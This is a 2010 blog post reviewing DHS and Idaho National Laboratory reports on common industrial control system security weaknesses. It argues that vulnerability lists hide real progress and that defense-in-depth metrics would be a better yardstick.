2010-12-30

ICS Security Progress Masked by Vulnerability Reports

(This article was originally published on the Findings From the Field blog.)

I just finished looking through two government reports from earlier this year on cyber security vulnerabilities: the DHS Control Systems Security Program (CSSP) Common Cyber Security Vulnerabilities Observed in DHS Industrial Control Systems Assessments and the Idaho National Laboratories (INL) National Security Test Bed (NTSB) Assessments Summary Report: Common Industrial Control System Cyber Security Weaknesses. The reports have a lot of similarities and are useful, to a degree. A casual reading of the reports however, suggests that we've made no progress in securing important control systems. This is incorrect - much progress has been made. What we really need to measure ICS security progress is not lists of high-priority vulnerabilities, but rather reports quantifying deviations from best practices and defense-in-depth postures.

The INL Report

The INL report describes the results of some 24 evaluations of control systems on the INL ICS testbed. Since the evaluations were of "vanilla" systems provided by vendors for testing, the scope of the vulnerabilities is limited to what vendors can do to make their systems stronger. The INL top-ten findings are:
  1. Unpatched OS vulnerabilities
  2. Vulnerable remote display protocols
  3. Web HMI vulnerabilities
  4. ICS services: Buffer Overflow vulnerabilities
  5. ICS applications: improper authentication
  6. ICS applications: improper access control
  7. Use of standard IT protocols with clear-text authentication
  8. ICS application protocols: unprotected transport of credentials
  9. ICS control protocols: vulnerable to message manipulation and injection
  10. Historians: vulnerable to SQL injections
Most of this is old news, and can be summarized as: ICS applications ship on or require the use of older, unpatched versions of operating systems, the applications themselves are vulnerable to lots of attacks, and extensive use of plain text protocols makes credentials capture and protocol manipulations straightforward.

The two interesting items are the remote display protocols finding and a discussion of proprietary protocols. The remote display protocols finding is surprising because I did not realize that product offerings made routine use of remote desktop tools. Industrial Defender's own security assessors routinely find weak remote desktop tools and protocols in use, but I had assumed these tools were set up by systems integrators or end users, not set up as a standard part of control systems offerings. The discussion of plain text protocols was interesting as well. INL observed that proprietary protocols are not significantly more secure than open, widely documented protocols. INL researchers were able to manipulate even proprietary protocols after only a little study of packet traces, without serious reverse-engineering efforts.

The CSSP Report

The CSSP report describes the result of some 15 security assessments, both of a small number of vendor-supplied setups in a lab, and of control systems in the field. As expected, the vendor findings are less comprehensive than the INL report and I won't go into them. The value of the CSSP report is their configuration and network findings. The findings are:

Configuration:
  1. Poor patch management
  2. Weak paswords/authentication configured
  3. Information disclosure of user credentials and other information
Network:
  1. Poor or non-existent network segmentation
  2. Improper firewall configuration
None of these are surprises.

Lies, Damned Lies, ...

These findings differ very little from findings security assessors discussed informally in presentations as long as 5-7 years ago, though back then no reports this systematic were easily available. Some of the apparent lack of progress is understandable - the problem of patching control systems and their operating systems is one of the most costly security problems to solve, both for vendors and for owners / operators. The same is true of the use of plain text protocols to communicate with field equipment - these protocols will take decades to eliminate completely.

I think this is misleading. The reports really do not reflect the many changes that have occurred in this field in the last half decade:
  • Most sites now have firewalls separating plant networks from enterprise networks.
  • The largest ICS vendors now support anti-virus technologies and such technologies are routinely deployed with new and upgraded control systems.
  • Many sites are now using VPNs for remote access to critical networks.
  • Many sites now have patch programs, though not as many or as comprehensive as corporate IT programs.
  • Many sites have implemented log aggregation and review practices, and some have gone as far as security event monitoring systems.
  • Many sites now have formal security programs, audits, budgets and staff.
These developments are poorly reflected in reports summarizing "highest priority vulnerabilities." Some of these developments represent quantitative trends in vulnerabilities, but as long as a minority of sites have no firewalls, for example, the lack of firewalls will continue to be flagged as a high-priority finding in reports such as these. Trends as to what fraction of sites and what fraction of products exhibit how many vulnerabilities over time would help us better understand progress that is being made. At a deeper level though, many of the changes we've seen address defense-in-depth postures rather than vulnerabilities. The authors of the reports clearly understand that defense-in-depth is important; both the INL and CSSP reports touch on defense-in-depth topics in their "recommendations" sections. For example, the reports discuss and recommend measures like anti-virus and intrusion detection technologies, even though these technologies do nothing to reduce vulnerability counts or severities.

To see progress in this field, what we need is regular, quantitative summary reports of how sites differ from security standards or from established best practices, rather than summaries of serious vulnerabilities. For example, a quantitative summary of NERC-CIP audit findings would be a step in this direction, since the NERC-CIP regulations describe a complete security program. Vulnerability severities and vulnerability counts are only one measure of a security program. If you patch everything, encrypt everything, configure everything correctly, and thus reduce the known vulnerability count to zero, you still may not have a strong defense-in-depth posture. Defense-in-depth includes intrusion detection, intrusion prevention, event monitoring, a strong security program and other measures, not just the elimination of vulnerabilities. We need better yardsticks if we are to measure progress in securing control systems.

1 comment:

  1. It is also important to remember that the systems have inherent vulnerabilities, but there are also additional vulnerabilities that are introduced by those responsible for programming/integrating these control systems.

    ReplyDelete